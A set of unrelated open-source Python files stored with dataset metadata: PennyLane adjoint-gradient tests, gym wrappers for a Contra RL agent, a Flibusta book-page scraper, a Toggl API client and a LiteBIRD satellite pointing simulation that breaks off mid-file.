qml.tape.QuantumScript.from_queue(q)\n with pytest.raises(\n qml.QuantumFunctionError,\n match=\"Adjoint differentiation method does not support Hamiltonian observables\",\n ):\n dev.adjoint_jacobian(tape)\n\n def test_unsupported_op(self, dev):\n \"\"\"Test if a QuantumFunctionError is raised for an unsupported operation, i.e.,\n multi-parameter operations that are not qml.Rot\"\"\"\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.CRot(0.1, 0.2, 0.3, wires=[0, 1])\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n with pytest.raises(qml.QuantumFunctionError, match=\"The CRot operation is not\"):\n dev.adjoint_jacobian(tape)\n\n def test_trainable_hermitian_warns(self):\n \"\"\"Test attempting to compute the gradient of a tape that obtains the\n expectation value of a Hermitian operator emits a warning if the\n parameters to Hermitian are trainable.\"\"\"\n dev = qml.device(\"default.qubit.legacy\", wires=3)\n\n mx = qml.matrix(qml.PauliX(0) @ qml.PauliY(2))\n with qml.queuing.AnnotatedQueue() as q:\n qml.expval(qml.Hermitian(mx, wires=[0, 2]))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {0}\n with pytest.warns(\n UserWarning, match=\"Differentiating with respect to the input parameters of Hermitian\"\n ):\n dev.adjoint_jacobian(tape)\n\n 
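# The parametrized tests below compare adjoint-method gradients against numerical\n # finite differences (qml.gradients.finite_diff) for single- and multi-parameter gates.\n 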
@pytest.mark.autograd\n @pytest.mark.parametrize(\"theta\", np.linspace(-2 * np.pi, 2 * np.pi, 7))\n @pytest.mark.parametrize(\"G\", [qml.RX, qml.RY, qml.RZ])\n def test_pauli_rotation_gradient(self, G, theta, tol, dev):\n \"\"\"Tests that the automatic gradients of Pauli rotations are correct.\"\"\"\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.StatePrep(np.array([1.0, -1.0], requires_grad=False) / np.sqrt(2), wires=0)\n G(theta, wires=[0])\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {1}\n\n calculated_val = dev.adjoint_jacobian(tape)\n\n # compare to finite differences\n tapes, fn = qml.gradients.finite_diff(tape)\n numeric_val = fn(qml.execute(tapes, dev, None))\n\n assert isinstance(calculated_val, np.ndarray)\n assert calculated_val.shape == ()\n assert np.allclose(calculated_val, numeric_val, atol=tol, rtol=0)\n\n @pytest.mark.autograd\n @pytest.mark.parametrize(\"theta\", np.linspace(-2 * np.pi, 2 * np.pi, 7))\n def test_Rot_gradient(self, theta, tol, dev):\n \"\"\"Tests that the device gradient of an arbitrary Euler-angle-parameterized gate is\n correct.\"\"\"\n params = np.array([theta, theta**3, np.sqrt(2) * theta])\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.StatePrep(np.array([1.0, -1.0], requires_grad=False) / np.sqrt(2), wires=0)\n qml.Rot(*params, wires=[0])\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {1, 2, 3}\n\n calculated_val = dev.adjoint_jacobian(tape)\n\n # compare to finite differences\n tapes, fn = qml.gradients.finite_diff(tape)\n numeric_val = fn(qml.execute(tapes, dev, None))\n\n assert isinstance(calculated_val, tuple)\n assert len(calculated_val) == 3\n assert all(isinstance(val, np.ndarray) and val.shape == () for val in calculated_val)\n assert np.allclose(calculated_val, numeric_val, atol=tol, rtol=0)\n\n def test_ry_gradient(self, tol, dev):\n \"\"\"Test that the gradient of the RY gate matches the exact analytic formula.\"\"\"\n\n par = 0.23\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.RY(par, wires=[0])\n qml.expval(qml.PauliX(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {0}\n\n # gradients\n exact = np.cos(par)\n tapes, fn = qml.gradients.finite_diff(tape)\n grad_F = fn(qml.execute(tapes, dev, None))\n grad_A = dev.adjoint_jacobian(tape)\n\n # different methods must agree\n assert isinstance(grad_A, np.ndarray) and grad_A.shape == ()\n assert np.allclose(grad_F, exact, atol=tol, rtol=0)\n assert np.allclose(grad_A, exact, atol=tol, rtol=0)\n\n def test_rx_gradient(self, tol, dev):\n \"\"\"Test that the gradient of the RX gate matches the known formula.\"\"\"\n a = 0.7418\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.RX(a, wires=0)\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n # circuit jacobians\n dev_jacobian = dev.adjoint_jacobian(tape)\n expected_jacobian = -np.sin(a)\n\n assert isinstance(dev_jacobian, np.ndarray)\n assert dev_jacobian.shape == ()\n assert np.allclose(dev_jacobian, expected_jacobian, atol=tol, rtol=0)\n\n def test_multiple_rx_gradient(self, tol):\n \"\"\"Tests that the gradient of multiple RX gates in a circuit yields the correct result.\"\"\"\n dev = qml.device(\"default.qubit.legacy\", wires=3)\n params = np.array([np.pi, np.pi / 2, np.pi / 3])\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.RX(params[0], wires=0)\n qml.RX(params[1], wires=1)\n qml.RX(params[2], wires=2)\n\n for idx in range(3):\n qml.expval(qml.PauliZ(idx))\n\n tape 
= qml.tape.QuantumScript.from_queue(q)\n # circuit jacobians\n dev_jacobian = dev.adjoint_jacobian(tape)\n assert isinstance(dev_jacobian, tuple)\n assert len(dev_jacobian) == 3\n assert all(isinstance(jac, tuple) and len(jac) == 3 for jac in dev_jacobian)\n assert all(all(isinstance(j, np.ndarray) for j in jac) for jac in dev_jacobian)\n\n expected_jacobian = -np.diag(np.sin(params))\n assert np.allclose(dev_jacobian, expected_jacobian, atol=tol, rtol=0)\n\n ops = {qml.RX, qml.RY, qml.RZ, qml.PhaseShift, qml.CRX, qml.CRY, qml.CRZ, qml.Rot}\n\n @pytest.mark.autograd\n @pytest.mark.parametrize(\"obs\", [qml.PauliY])\n @pytest.mark.parametrize(\n \"op\", [qml.RX(0.4, wires=0), qml.CRZ(1.0, wires=[0, 1]), qml.Rot(0.2, -0.1, 0.2, wires=0)]\n )\n def test_gradients(self, op, obs, tol, dev):\n \"\"\"Tests that the gradients of circuits match between the finite difference and device\n methods.\"\"\"\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.Hadamard(wires=0)\n qml.RX(0.543, wires=0)\n qml.CNOT(wires=[0, 1])\n\n qml.apply(op)\n\n qml.Rot(1.3, -2.3, 0.5, wires=[0])\n qml.RZ(-0.5, wires=0)\n qml.adjoint(qml.RY(0.5, wires=1))\n qml.CNOT(wires=[0, 1])\n\n qml.expval(obs(wires=0))\n qml.expval(qml.PauliZ(wires=1))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = set(range(1, 1 + op.num_params))\n\n tapes, fn = qml.gradients.finite_diff(tape)\n grad_F = fn(qml.execute(tapes, dev, None))\n grad_D = dev.adjoint_jacobian(tape)\n\n assert isinstance(grad_D, tuple)\n assert len(grad_D) == 2\n\n if op.num_params == 1:\n assert all(isinstance(g, np.ndarray) and g.shape == () for g in grad_D)\n else:\n assert all(isinstance(g, tuple) and len(g) == op.num_params for g in grad_D)\n assert all(all(isinstance(_g, np.ndarray) for _g in g) for g in grad_D)\n\n assert np.allclose(grad_D, grad_F, atol=tol, rtol=0)\n\n @pytest.mark.autograd\n def test_gradient_gate_with_multiple_parameters(self, tol, dev):\n \"\"\"Tests that gates with multiple free parameters yield correct gradients.\"\"\"\n x, y, z = [0.5, 0.3, -0.7]\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.RX(0.4, wires=[0])\n qml.Rot(x, y, z, wires=[0])\n qml.RY(-0.2, wires=[0])\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {1, 2, 3}\n\n grad_D = dev.adjoint_jacobian(tape)\n tapes, fn = qml.gradients.finite_diff(tape)\n grad_F = fn(qml.execute(tapes, dev, None))\n\n # gradient has the correct shape and every element is nonzero\n assert isinstance(grad_D, tuple)\n assert len(grad_D) == 3\n assert all(isinstance(g, np.ndarray) for g in grad_D)\n\n assert np.count_nonzero(grad_D) == 3\n # the different methods agree\n assert np.allclose(grad_D, grad_F, atol=tol, rtol=0)\n\n def test_use_device_state(self, tol, dev):\n \"\"\"Tests that when using the device state, the correct answer is still returned.\"\"\"\n\n x, y, z = [0.5, 0.3, -0.7]\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.RX(0.4, wires=[0])\n qml.Rot(x, y, z, wires=[0])\n qml.RY(-0.2, wires=[0])\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {1, 2, 3}\n\n dM1 = dev.adjoint_jacobian(tape)\n\n qml.execute([tape], dev, None)\n dM2 = dev.adjoint_jacobian(tape, use_device_state=True)\n\n assert np.allclose(dM1, dM2, atol=tol, rtol=0)\n\n # pylint: disable=protected-access\n def test_provide_starting_state(self, tol, dev):\n \"\"\"Tests provides correct answer when provided starting state.\"\"\"\n x, y, z = [0.5, 0.3, -0.7]\n\n with qml.queuing.AnnotatedQueue() 
as q:\n qml.RX(0.4, wires=[0])\n qml.Rot(x, y, z, wires=[0])\n qml.RY(-0.2, wires=[0])\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {1, 2, 3}\n\n dM1 = dev.adjoint_jacobian(tape)\n\n qml.execute([tape], dev, None)\n dM2 = dev.adjoint_jacobian(tape, starting_state=dev._pre_rotated_state)\n\n assert np.allclose(dM1, dM2, atol=tol, rtol=0)\n\n def test_gradient_of_tape_with_hermitian(self, tol):\n \"\"\"Test that computing the gradient of a tape that obtains the\n expectation value of a Hermitian operator works correctly.\"\"\"\n dev = qml.device(\"default.qubit.legacy\", wires=3)\n\n a, b, c = [0.5, 0.3, -0.7]\n\n def ansatz(a, b, c):\n qml.RX(a, wires=0)\n qml.RX(b, wires=1)\n qml.RX(c, wires=2)\n qml.CNOT(wires=[0, 1])\n qml.CNOT(wires=[1, 2])\n\n mx = qml.matrix(qml.PauliX(0) @ qml.PauliY(2))\n with qml.queuing.AnnotatedQueue() as q:\n ansatz(a, b, c)\n qml.RX(a, wires=0)\n qml.expval(qml.Hermitian(mx, wires=[0, 2]))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {0, 1, 2}\n res = dev.adjoint_jacobian(tape)\n\n expected = [\n np.cos(a) * np.sin(b) * np.sin(c),\n np.cos(b) * np.sin(a) * np.sin(c),\n np.cos(c) * np.sin(b) * np.sin(a),\n ]\n assert np.allclose(res, expected, atol=tol, rtol=0)\n\n def test_multi_return(self, dev):\n \"\"\"Test that the gradients of multiple observables are correct\"\"\"\n\n x = np.array([0.6, 0.8, 1.0])\n\n ops = [\n qml.Hadamard(wires=0),\n qml.RX(0.543, wires=0),\n qml.CNOT(wires=[0, 1]),\n qml.Rot(x[0], x[1], x[2], wires=0),\n qml.Rot(1.3, -2.3, 0.5, wires=[0]),\n qml.RZ(-0.5, wires=0),\n qml.RY(0.5, wires=1),\n qml.CNOT(wires=[0, 1]),\n ]\n\n observables = [\n qml.PauliX(0),\n qml.PauliX(0) @ qml.PauliZ(1),\n qml.Projector([0], wires=0),\n qml.Hermitian([[0, 1], [1, 0]], wires=1),\n ]\n\n with qml.queuing.AnnotatedQueue() as q:\n for op in ops:\n qml.apply(op)\n\n for ob in observables:\n qml.expval(ob)\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {1, 2, 3}\n\n grad_D = dev.adjoint_jacobian(tape)\n\n # check that the type and format of the adjoint jacobian is correct\n assert isinstance(grad_D, tuple)\n assert len(grad_D) == len(observables)\n assert all(isinstance(g, tuple) for g in grad_D)\n assert all(len(g) == 3 for g in grad_D)\n assert all(all(isinstance(_g, np.ndarray) for _g in g) for g in grad_D)\n\n # check the results against individually executed tapes\n for i, ob in enumerate(observables):\n with qml.queuing.AnnotatedQueue() as q_indiv_tape:\n for op in ops:\n qml.apply(op)\n\n qml.expval(ob)\n\n indiv_tape = qml.tape.QuantumScript.from_queue(q_indiv_tape)\n indiv_tape.trainable_params = {1, 2, 3}\n\n expected = dev.adjoint_jacobian(indiv_tape)\n\n assert isinstance(expected, tuple)\n assert len(expected) == 3\n assert all(isinstance(g, np.ndarray) for g in expected)\n\n assert np.allclose(grad_D[i], expected)\n","repo_name":"PennyLaneAI/pennylane","sub_path":"tests/gradients/core/test_adjoint_diff.py","file_name":"test_adjoint_diff.py","file_ext":"py","file_size_in_byte":14691,"program_lang":"python","lang":"en","doc_type":"code","stars":1965,"dataset":"github-code","pt":"52"} +{"seq_id":"40582298840","text":"from collections import deque\nfrom gym import spaces\nfrom retro import make\nimport cv2, gym, numpy as np, utils\n\n\nclass ActionsDiscretizer(gym.ActionWrapper):\n def __init__(self, env, actions):\n super(ActionsDiscretizer, self).__init__(env)\n buttons = env.buttons\n self._actions = []\n for action in actions:\n arr = 
np.array([False]*len(buttons))\n for button in action:\n arr[buttons.index(button)] = True\n self._actions.append(arr)\n self.action_space = spaces.Discrete(len(self._actions))\n\n def action(self, action):\n return self._actions[action].copy()\n\nclass ProcessFrame(gym.ObservationWrapper):\n def __init__(self, env, width=84, height=84):\n super(ProcessFrame, self).__init__(env)\n self.observation_space = spaces.Box(low=0, high=255, shape=(1, width, height))\n self.shape = width, height\n\n def observation(self, frame):\n frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\n frame = cv2.resize(frame, self.shape, interpolation=cv2.INTER_AREA)\n frame = frame[None, :, :]\n return frame\n\nclass AllowBacktracking(gym.Wrapper):\n def __init__(self, env, width=84, height=84, skip=4):\n super(AllowBacktracking, self).__init__(env)\n self.observation_space = spaces.Box(low=0, high=255, shape=(4, width, height))\n self.states = deque(np.zeros((4, width, height), dtype=np.float32), maxlen=4)\n self.score, self.skip = 0, skip\n\n def step(self, action):\n total_reward, state_buffer = 0, deque(maxlen=2)\n for _ in range(self.skip):\n state, reward, done, info = self.env.step(action)\n total_reward += reward + (info[\"score\"]-self.score) * 0.5\n self.score = info[\"score\"]\n state_buffer.append(state)\n if done: break\n else:\n _, _, done, _ = self.env.step(0)\n self.states.append(np.max(np.concatenate(state_buffer, 0), 0))\n return np.array(self.states)[None, :, :, :].astype(np.float32), total_reward, done, info\n\n def reset(self, **kwargs):\n self.score, state = 0, self.env.reset(**kwargs)\n self.states.extend(np.concatenate([state for _ in range(4)], 0))\n return np.array(self.states)[None, :, :, :].astype(np.float32)\n\nclass RewardScaler(gym.RewardWrapper):\n def __init__(self, env, scale=0.25):\n super(RewardScaler, self).__init__(env)\n self.scale = scale\n\n def reward(self, reward):\n return reward * self.scale\n\nclass ContraWinner(gym.Wrapper):\n def __init__(self, env):\n super(ContraWinner, self).__init__(env)\n self.zeros, self.level, self.lives, self.finish = 0, 0, 0, None\n self.actions = deque(maxlen=50)\n\n def step(self, action):\n state, reward, done, info = self.env.step(action)\n if self.finish == None:\n self.lives, self.level = info[\"lives\"], info[\"level\"]\n self.finish = lambda level: level != self.level\n self.lives = max(self.lives, info[\"lives\"])\n info[\"finish\"] = self.finish(info[\"level\"])\n self.actions.append((action, max(0, reward)))\n self.zeros += not reward\n done |= info[\"finish\"] or info[\"lives\"] < self.lives or self.zeros > 500 \\\n or self.actions.count((action, 0)) == self.actions.maxlen\n if done:\n if info[\"finish\"]:\n reward += 1000\n else:\n reward += -10\n return state, reward, done, info\n\n def reset(self, **kwargs):\n self.zeros, self.level, self.lives, self.finish = 0, 0, 0, None\n self.actions.clear()\n return self.env.reset(**kwargs)\n\ndef create_runtime_env(game, state, action_type, record=False):\n actions = utils.Actions.get(action_type)\n assert actions, \"Invalid action type.\"\n env = make(game, state, record=record)\n env = ActionsDiscretizer(env, actions)\n env = ProcessFrame(env)\n env = AllowBacktracking(env)\n env = RewardScaler(env)\n env = ContraWinner(env)\n return env, env.observation_space.shape[0], 
len(actions)\n","repo_name":"mycode2021/Agent-contra","sub_path":"utils/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"3598497767","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom analyser.adds.helpers import make_correct_link\nfrom analyser.adds import logger\n\nclass Retriever:\n\n @staticmethod\n def get_summary(soup):\n annotation_text = soup.find('h2',text=u'Аннотация')\n annotation_tag = annotation_text.parent\n paragraph_with_summary = 1;\n p_with_summary = annotation_tag.findNextSiblings('p')\n if len(p_with_summary) < 2:\n return None\n p_with_summary = p_with_summary[paragraph_with_summary]\n # check on case with empty annotation:\n ch = p_with_summary.findChildren()\n if ch:\n if ch[0].name == u'a':\n return None\n return p_with_summary.text\n\n @staticmethod\n def get_links(soup, page_link):\n links = {}\n select = soup.find('select', id='useropt')\n if select:\n format_options = select.findAll('option')\n formats = []\n for format_option in format_options:\n formats.append(format_option['value'])\n for format in formats:\n link = \"%s/%s\" % (page_link, format)\n links[format] = make_correct_link(page_link, link)\n else:\n number = Retriever.get_booknumber_from_link(page_link)\n anchors = soup.findAll('a', href=re.compile('/b/%s/[A-z]+$' % number ))\n anchors = filter(Retriever.is_available_anchor, anchors)\n for link in anchors:\n format = Retriever.get_format_from_anchor(link)\n correct_link = make_correct_link(page_link, link['href'])\n links[format] = correct_link\n return links\n\n @staticmethod\n def is_available_anchor(anchor):\n unavailable = ('forum','read','edit','complain')\n m = re.search('/b/[0-9]+/([A-z]+)', anchor['href'])\n if not m:\n return False\n format = m.groups()[0]\n if format in unavailable:\n return False\n return True\n\n @staticmethod\n def get_format_from_anchor(anchor):\n m = re.search('/b/[0-9]+/([A-z]+)', anchor['href'])\n format = m.groups()[0]\n if format == 'download':\n format = anchor.text.split()[1]\n format = format[:-1] #clean up from ')'\n return format\n\n @staticmethod\n def get_booknumber_from_link(link):\n m = re.search('/b/([0-9]+)', link)\n number = m.groups()[0]\n return number\n\n @staticmethod\n def get_tags(soup):\n tags = [ anchor_tag.text for anchor_tag in soup.findAll('a', {\"class\":\"genre\"})]\n return tags\n\n @staticmethod\n def get_picture_link(soup):\n img = soup.find('img', src=re.compile('/i/[0-9\\/]+cover.jpg$'))\n if not img:\n return None\n return img['src']\n\n @staticmethod\n def get_picture(soup,page_link, id):\n img_link = Retriever.get_picture_link(soup)\n if not img_link:\n return None\n img_link = make_correct_link(page_link,img_link)\n return img_link\n\n @staticmethod\n def read_description(description_line):\n description = {}\n #Last Name;First Name;Middle Name;Title;Subtitle;Language;Year;Series;ID\n field_list = ['lastname', 'firstname', 'middlename', 'title', 'subtitle', 'language','year',' series', 'ID' ]\n line = description_line[:-1] #remove \\n from the end of line\n descr_list = line.split(';')\n if len(descr_list) != len(field_list):\n descr_list = Retriever.processing_describe_list(descr_list)\n for number, field in enumerate(field_list):\n description[field] = descr_list[number]\n return description\n\n @staticmethod\n def processing_describe_list(descr_list):\n length = len(descr_list)\n if length >=9:\n # 0 1 2 3 4 5 6 7 8\n #Last Name;First Name;Middle 
Name;Title;Subtitle;Language;Year;Series;ID\n field_list = ['lastname', 'firstname', 'middlename', 'title', 'subtitle', 'language','year',' series', 'ID' ]\n line = description_line[:-1] #remove \\n from the end of line\n descr_list = line.split(';')\n if len(descr_list) != len(field_list):\n descr_list = Retriever.processing_describe_list(descr_list)\n for number, field in enumerate(field_list):\n description[field] = descr_list[number]\n return description\n\n @staticmethod\n def processing_describe_list(descr_list):\n length = len(descr_list)\n if length >=9:\n # 0 1 2 3 4 5 6 7 8\n #Last Name;First Name;Middle Name;Title;Subtitle;Language;Year;Series;ID\n descr_list[3] = \";\".join(descr_list[3:-5]) # join all parts of the title back together\n descr_list[4:] = descr_list[-5:length] # subtitle, language, year, series, ID <---\n descr_list = descr_list[0:9] # cutting to the right number of fields\n return descr_list","repo_name":"ktisha/ebook-service","sub_path":"analyser/parsers/FlibustaNet/Retriever.py","file_name":"Retriever.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14396227535","text":"import requests\n\n\nclass TogglClientApi:\n\n defaultCredentials = {\n 'token': '',\n 'username': '',\n 'workspace_name': '',\n 'base_url': 'https://www.toggl.com/api',\n 'ver_api': 8,\n 'base_url_report': 'https://toggl.com/reports/api',\n 'ver_report': 2\n }\n credentials = {}\n api_token = ''\n api_username = ''\n api_base_url = None\n api_report_base_url = None\n workspace_name = None\n requests = None\n\n def __init__(self, credentials):\n self.credentials = dict(self.defaultCredentials.items() + credentials.items())\n self.api_base_url = self.build_api_url(self.credentials['base_url'], self.credentials['ver_api'])\n self.api_report_base_url = self.build_api_url(self.credentials['base_url_report'], self.credentials['ver_report'])\n self.api_token = self.credentials['token']\n self.api_username = self.credentials['username']\n return\n\n @staticmethod\n def build_api_url(base_url, version):\n return base_url + '/v' + str(version)\n\n def get_workspace_by_name(self, name):\n workspace_found = None\n list_response = self.get_workspaces()\n\n if list_response.status_code != requests.codes.ok:\n list_response.raise_for_status()\n\n workspace_list = list_response.json()\n for workspace in workspace_list:\n if workspace['name'] == name:\n workspace_found = workspace\n\n return workspace_found\n\n def get_workspaces(self):\n return self.query('/workspaces')\n\n def get_workspace_members(self, workspace_id):\n response = self.query('/workspaces/'+str(workspace_id)+'/workspace_users')\n return response\n\n \"\"\"\n @param start_date YYYY-MM-DD\n @param end_date YYYY-MM-DD\n \"\"\"\n def get_user_hours_range(self, user_agent, workspace_id, user_id, start_date, end_date):\n params = {\n 'workspace_id': workspace_id,\n 'since': start_date,\n 'until': end_date,\n 'user_agent': user_agent,\n 'user_ids': user_id,\n 'grouping': 'users',\n 'subgrouping': 'projects'\n }\n projects_worked_response = self.query_report('/summary', params)\n\n json_response = projects_worked_response.json()\n\n if len(json_response['data']) > 0:\n time_total = json_response['data'][0]['time']\n else:\n time_total = 0\n\n return time_total\n\n def query_report(self, url, params={}, method='GET'):\n return self._query(self.api_report_base_url, url, params, method)\n\n def query(self, url, params={}, method='GET'):\n return self._query(self.api_base_url, url, params, method)\n\n def _query(self, base_url, url, params, method):\n api_endpoint = base_url + url\n toggl_auth = (self.api_token, 'api_token')\n toggl_headers = {'content-type': 'application/json'}\n\n if method == \"POST\":\n return False\n elif method == \"GET\":\n response = self._do_get_query(api_endpoint, headers=toggl_headers, auth=toggl_auth, params=params)\n else:\n response = self._do_get_query(api_endpoint, headers=toggl_headers, auth=toggl_auth, params=params)\n\n return response\n\n @staticmethod\n def _do_get_query(url, headers, auth, params):\n response = 
requests.get(url, headers=headers, auth=auth, params=params)\n\n return response","repo_name":"mechastorm/toggl-python-api-client","sub_path":"api_client.py","file_name":"api_client.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"74969046243","text":"\nimport sys\nimport os\nimport time\nimport argparse\n\nimport numpy as np\nimport healpy as hp\nimport quaternionarray as qa\n\nimport litebird as lb\n\n# mpi4py is optional here; lbtime() and the reductions below only touch MPI when comm is set\ntry:\n from mpi4py import MPI\nexcept ImportError:\n MPI = None\n\n\ncomm = None\nrank = 0\nnproc = 1\n\ndef lbtime():\n if comm is not None:\n return MPI.Wtime()\n else:\n return time.time()\n\ndef boresight_sim(nsim=1000, qprec=None, samplerate=23.0, spinperiod=10.0, spinangle=30.0, precperiod=93.0, precangle=65.0):\n\n spinrate = 1.0 / (60.0 * spinperiod)\n spinangle = spinangle * np.pi / 180.0\n precrate = 1.0 / (60.0 * precperiod)\n precangle = precangle * np.pi / 180.0\n\n xaxis = np.array([1,0,0], dtype=np.float64)\n yaxis = np.array([0,1,0], dtype=np.float64)\n zaxis = np.array([0,0,1], dtype=np.float64)\n\n satrot = None\n if qprec is None:\n satrot = np.tile(qa.rotation(np.array([0.0, 1.0, 0.0]), np.pi/2), nsim).reshape(-1,4)\n elif qprec.flatten().shape[0] == 4:\n satrot = np.tile(qprec, nsim).reshape(-1,4)\n elif qprec.shape == (nsim, 4):\n satrot = qprec\n else:\n raise RuntimeError(\"qprec has wrong dimensions\")\n\n # Time-varying rotation about precession axis. \n # Increment per sample is\n # (2pi radians) X (precrate) / (samplerate)\n # Construct quaternion from axis / angle form.\n precang = np.arange(nsim, dtype=np.float64)\n precang *= 2.0 * np.pi * precrate / samplerate\n\n # (zaxis, precang)\n cang = np.cos(0.5 * precang)\n sang = np.sin(0.5 * precang)\n precaxis = np.multiply(sang.reshape(-1,1), np.tile(zaxis, nsim).reshape(-1,3))\n precrot = np.concatenate((precaxis, cang.reshape(-1,1)), axis=1)\n\n # Rotation which performs the precession opening angle\n precopen = qa.rotation(np.array([1.0, 0.0, 0.0]), precangle)\n\n # Time-varying rotation about spin axis. 
Increment \n # per sample is\n # (2pi radians) X (spinrate) / (samplerate)\n # Construct quaternion from axis / angle form.\n spinang = np.arange(nsim, dtype=np.float64)\n spinang *= 2.0 * np.pi * spinrate / samplerate\n\n cang = np.cos(0.5 * spinang)\n sang = np.sin(0.5 * spinang)\n spinaxis = np.multiply(sang.reshape(-1,1), np.tile(zaxis, nsim).reshape(-1,3))\n spinrot = np.concatenate((spinaxis, cang.reshape(-1,1)), axis=1)\n\n # Rotation which performs the spin axis opening angle\n spinopen = qa.rotation(np.array([1.0, 0.0, 0.0]), spinangle)\n\n # compose final rotation\n boresight = qa.mult(satrot, qa.mult(precrot, qa.mult(precopen, qa.mult(spinrot, spinopen))))\n\n return boresight\n\n\ndef sim2(fp, freq, borequats, hwpang, hits, alps, inpp=None, hwprate=88.0, outdir = ''):\n\n nsim = borequats.shape[0]\n nhpix = hits.shape[0]\n nside = int(np.sqrt(nhpix / 12))\n\n if nhpix != 12*nside*nside:\n raise RuntimeError('invalid healpix nside value')\n if hwpang.shape[0] != borequats.shape[0]:\n raise RuntimeError('HWP angle vector must be same length as boresight quaternions')\n if inpp is not None:\n if inpp.shape[0] != nhpix:\n raise RuntimeError('N_pp^-1 number of pixels must match N_hits')\n if inpp.shape[1] != 6:\n raise RuntimeError('N_pp^-1 must have 6 elements per pixel')\n\n xaxis = np.array([1,0,0], dtype=np.float64)\n yaxis = np.array([0,1,0], dtype=np.float64)\n zaxis = np.array([0,0,1], dtype=np.float64)\n\n # generate hitcount map and alpha\n for i, det in enumerate(fp.detectors(freq=freq)):\n\n detrot = qa.mult(borequats, fp.quat(det))\n detdir = qa.rotate(detrot, np.tile(zaxis, nsim).reshape(-1,3))\n dettheta, detphi = hp.vec2ang(detdir)\n detpix = hp.vec2pix(nside, detdir[:,0], detdir[:,1], detdir[:,2])\n detbinned = np.bincount(detpix)\n hits[0:detbinned.shape[0]] += detbinned[:]\n\n outfile = os.path.join(outdir, 'theta.bin')\n with open(outfile, 'wb') as f:\n dettheta.tofile(f)\n outfile = os.path.join(outdir, 'phi.bin')\n with open(outfile, 'wb') as f:\n detphi.tofile(f)\n outfile = os.path.join(outdir, 'pix.bin')\n with open(outfile, 'wb') as f:\n detpix.tofile(f)\n\n if np.mod(i,2)!=1: \n alpdir = qa.rotate(detrot, np.tile(xaxis, nsim).reshape(-1,3))\n x = alpdir[:,0]*detdir[:,1] - alpdir[:,1]*detdir[:,0]\n y = alpdir[:,0]*(-detdir[:,2]*detdir[:,0]) + alpdir[:,1]*(-detdir[:,2]*detdir[:,1]) + alpdir[:,2]*(detdir[:,0]*detdir[:,0]+detdir[:,1]*detdir[:,1]) \n angle = np.arctan2(y,x)\n\n outfile = os.path.join(outdir, 'angle.bin')\n with open(outfile, 'wb') as f:\n angle.tofile(f)\n\n #denom = (detbinned+1e-6)*np.float(len(fp.detectors(freq=freq)))\n #for n in range(4):\n # Re = np.bincount(detpix, weights=np.cos((n+1)*angle))/denom\n # Im = np.bincount(detpix, weights=np.sin((n+1)*angle))/denom\n # alps[0:Re.shape[0],2*n] += Re\n # alps[0:Im.shape[0],2*n+1] += Im\n #print(np.mean(alps[:,0]),np.mean(alps[:,4]))\n\n\ndef main():\n\n if rank == 0:\n print(\"Running with {} processes\".format(nproc))\n\n global_start = lbtime()\n\n allowed_freq = []\n for type in sorted(lb.pixel_types):\n for f in lb.pixel_to_freq[type]:\n allowed_freq.append(f)\n allowed_str = \", \".join(allowed_freq)\n #allowed_str = ''\n\n parser = argparse.ArgumentParser( description='Simulate LiteBird pointing.' )\n parser.add_argument( '--frequency', required=False, default='040', help='Frequency as a 3-digit string. 
Valid values are {}'.format(allowed_str) )\n parser.add_argument( '--samplerate', required=False, default=1.0, help='Detector sample rate (Hz)' )\n parser.add_argument( '--spinperiod', required=False, default=10.0, help='The period (in minutes) of the rotation about the spin axis' )\n parser.add_argument( '--spinangle', required=False, default=30.0, help='The opening angle (in degrees) of the boresight from the spin axis' )\n parser.add_argument( '--precperiod', required=False, default=90.0, help='The period (in minutes) of the rotation about the precession axis' )\n parser.add_argument( '--precangle', required=False, default=65.0, help='The opening angle (in degrees) of the spin axis from the precession axis' )\n parser.add_argument( '--hwprpm', required=False, default=0.0, help='The rate (in RPM) of the HWP rotation' )\n parser.add_argument( '--hwpstep', required=False, default=None, help='For stepped HWP, the angle in degrees of each step' )\n parser.add_argument( '--hwpsteptime', required=False, default=0.0, help='For stepped HWP, the the time in seconds between steps' )\n parser.add_argument( '--obs', required=False, default=24.0, help='Number of hours in one science observation' )\n parser.add_argument( '--gap', required=False, default=0.0, help='Cycle time in hours between science obs' )\n parser.add_argument( '--numobs', required=False, default=1, help='Number of complete science + gap observations' )\n parser.add_argument( '--nside', required=False, default=1024, help='Healpix NSIDE' )\n parser.add_argument( '--invnpp', required=False, default=False, action='store_true', help='Also compute the block diagonal N_pp^-1 matrix' )\n parser.add_argument( '--fp', required=False, default=\"boreshift\", help='Allowed values are \"bore\", 